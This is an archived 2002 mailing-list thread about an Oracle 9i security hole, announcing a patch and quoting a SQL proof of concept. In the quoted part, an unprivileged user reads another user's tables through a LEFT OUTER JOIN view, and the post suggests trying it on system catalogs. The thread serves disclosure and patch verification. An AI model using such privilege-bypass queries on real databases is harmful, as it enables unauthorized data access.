Re: 9iDB Security Hole?

From: Vladimir M. Zakharychev <bob_at_dpsp-yes.com>
Date: Thu, 18 Apr 2002 11:24:04 +0400
Message-ID: <a9ls7j$fri$1@babylon.agtel.net>

one-off patch for bug 2121935 (ARU:1600347) was put out for 9.0.1.3/Solaris yesterday. Anyone with 9.0.1.3/Sol can install it and verify that it closes the hole altogether?

--
Vladimir Zakharychev (bob@dpsp-yes.com)                http://www.dpsp-yes.com
Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
All opinions are mine and do not necessarily go in line with those of my employer.


"Vladimir M. Zakharychev" <bob_at_dpsp-yes.com> wrote in message news:a9et5g$9sa$1_at_babylon.agtel.net...


> Anyone with 9i can confirm this?

>

> From: news [mailto:news_at_host.talk.ru] On Behalf Of ...

> ...relcom.comp.dbms.oracle

>

>

> connect  system/****@database

> CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY

> TABLESPACE temp;

> CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY

> TABLESPACE temp;

> Grant Create  Session To us1;

> Grant Create  Session To us2;

> Grant Create Table To us1;

> grant unlimited tablespace to us1;

> Grant Create View To us2;

>

> Connect us1/us11_at_database;

> Create Table t1(c1 Number(1));

> Insert Into t1(c1) Values(9);

> Create Table t2(c1 Number(1));

> Insert Into t2(c1) Values(9);

>

> commit;

> Connect us2/us11_at_database;

>

> SQL> Select * From us1.t1;

> ORA-00942: table or view does not exist

> -- this is expected

> SQL> Select * From us1.t2;

> ORA-00942: table or view does not exist

> -- this one too

> SQL> Create View aa As Select * From us1.t1;

> ORA-00942: table or view does not exist

> -- and this one

> SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1

> >From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;

>

> View created

> -- now this one is NOT !!!!!

> SQL> select * from aa;

>

> T1_C1 T2_C1

> ---- ----

>    9    9

>

>

> This effectively means that LEFT OUTER JOIN allows to create views

> on tables that are normally not visible (provided that unprivileged user

> knows table and column names).

> If you can confirm this basic example, can you also try it on system

> catalog tables/views? If you can not confirm, please specify your version

> and platform so that we know which ones are not affected (poster didn't

> specify version, but I suggest it's 9.0.1.1 on either NT or Linux).

>

> --

> Vladimir Zakharychev (bob@dpsp-yes.com)                http://www.dpsp-yes.com

> Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.

> All opinions are mine and do not necessarily go in line with those of my employer.

>

>

>

Received on Thu Apr 18 2002 - 02:24:04 CDT